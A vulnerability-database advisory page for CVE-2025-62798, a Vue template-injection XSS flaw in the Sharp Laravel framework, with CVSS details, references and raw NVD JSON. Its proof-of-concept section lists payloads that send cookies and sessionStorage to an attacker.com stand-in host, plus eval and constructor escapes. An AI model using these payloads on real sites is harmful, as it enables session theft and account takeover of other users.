CVE-2025-62798

Description

Sharp is a content management framework built for Laravel as a package. Prior to 9.11.1, a Cross-Site Scripting (XSS) vulnerability was discovered in code16/sharp when rendering content using the SharpShowTextField component. In affected versions, expressions wrapped in {{ & }} were evaluated by Vue. This allowed attackers to inject arbitrary JavaScript or HTML that executes in the browser when the field is displayed. The issue has been fixed in v9.11.1 .

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

code16/sharp < 9.11.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-62798 XSS PoC for Sharp Framework -->
<!-- Attack Vector: Inject malicious Vue expression in SharpShowTextField -->

<!-- Malicious Payload to steal cookies -->
{{window.location='https://attacker.com/steal?c='+document.cookie}}

<!-- Alternative Payload - Execute arbitrary JS -->
{{eval(atob('YWxlcnQoJ3hzc2NpZGluZycpOw=='))}}

<!-- Steal session data -->
{{fetch('https://attacker.com/log?data='+btoa(JSON.stringify(sessionStorage)))}}

<!-- HTML Injection variant -->
{{$refs.x}} or {{constructor.constructor('alert(1)')()}}

<!-- Reproduction Steps: -->
<!-- 1. Navigate to SharpShowTextField in admin panel -->
<!-- 2. Input any of the above payloads in text field -->
<!-- 3. Save and view the page where this field is displayed -->
<!-- 4. Observe JavaScript execution in victim's browser -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62798
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62798
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62798/
[4] VulDB https://vuldb.com/cve/CVE-2025-62798
[5] https://github.com/code16/sharp/pull/654
[6] https://github.com/code16/sharp/releases/tag/v9.11.1
[7] https://github.com/code16/sharp/security/advisories/GHSA-9f58-4465-23c7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62798", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:40.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sharp is a content management framework built for Laravel as a package. Prior to 9.11.1, a Cross-Site Scripting (XSS) vulnerability was discovered in code16/sharp when rendering content using the SharpShowTextField component. In affected versions, expressions wrapped in {{ & }} were evaluated by Vue. This allowed attackers to inject arbitrary JavaScript or HTML that executes in the browser when the field is displayed. The issue has been fixed in v9.11.1 ."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/code16/sharp/pull/654", "source": "[email protected]"}, {"url": "https://github.com/code16/sharp/releases/tag/v9.11.1", "source": "[email protected]"}, {"url": "https://github.com/code16/sharp/security/advisories/GHSA-9f58-4465-23c7", "source": "[email protected]"}]}}